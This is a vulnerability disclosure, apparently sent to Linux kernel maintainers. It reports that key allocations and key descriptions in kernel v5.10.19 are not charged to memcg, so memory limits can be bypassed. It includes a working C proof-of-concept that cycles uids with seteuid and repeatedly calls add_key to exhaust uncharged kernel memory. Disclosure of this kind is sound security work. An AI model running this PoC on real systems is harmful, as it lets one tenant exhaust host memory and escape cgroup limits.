Hi, our team has found a bug in key_alloc() on Linux kernel v5.10.19, which leads to bypassing memcg limits.
The bug is caused by the code snippets listed below:
/*--------------- key.c --------------------*/
...
276 /* allocate and initialise the key and its description */
277 key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
278 if (!key)
279 goto no_memory_2;
...
/*---------------- end ---------------------*/
/*------------- keyctl.c -------------------*/
...
95 if (_description) {
96 description = strndup_user(_description, KEY_MAX_DESC_SIZE);
97 if (IS_ERR(description)) {
...
/*--------------- end ---------------------*/
Each user can allocate ~20KB uncharged memory by calling add_key syscall to trigger the listed code.
Code at line 277 in the first snippet allocates a new struct key object that is not charged by memcg, as no accouting flag is passed to neither the
allocation site here nor the key_jar's creating site. At line 96 in the second snippet, we found that memory used by description of a key,
which has a maximum size of 4096 bytes, is also not charged. A user can allocate multiple keys and consume more uncharged memory.
The upper limit of key memory's size is set to 20,000 bytes by default for each user.
The bug can cause severe memcg limit bypassing if a process can change its uid and bypass the above limit. For example, a user may own root privilege
in its user namespace and leverage seteuid() syscall to continuously change its uid.
Our evaluation on QEMU v5.1.0 + cgroup v2 shows that, under this assumption, we could consume ~2.2G memory by allocating keys from 100,000 different uids, while the memory charged by memcg is ~215MB.
The PoC code is listed below:
/*--------------- PoC --------------------*/
#include <asm/unistd.h>
#include <linux/keyctl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
char desc[4000];
void alloc_key_user(int id) {
int i = 0, times = -1;
__s32 serial = 0;
int res_uid = seteuid(id);
if (res_uid == 0)
printf("uid allocation success on id %d!\n", id);
else {
printf("uid allocation failed on id %d!\n", id);
return;
}
srand(time(0));
while (serial != 0xffffffff) {
++times;
for (i = 0; i < 3900; ++i)
desc[i] = rand()%255 + 1;
desc[i] = '\0';
serial = syscall(__NR_add_key, "user", desc, "payload",
strlen("payload"), KEY_SPEC_SESSION_KEYRING);
}
printf("allocation happened %d times.\n", times);
seteuid(0);
}
int main() {
int loop_times = 0;
int start_uid = 0;
scanf("%d %d", &start_uid, &loop_times);
for (int i = 0; i < loop_times; ++i) {
alloc_key_user(i+start_uid);
}
return 0;
}
/*-------------PoC end ---------------------*/
Thanks!
Best regards,
Yutian Yang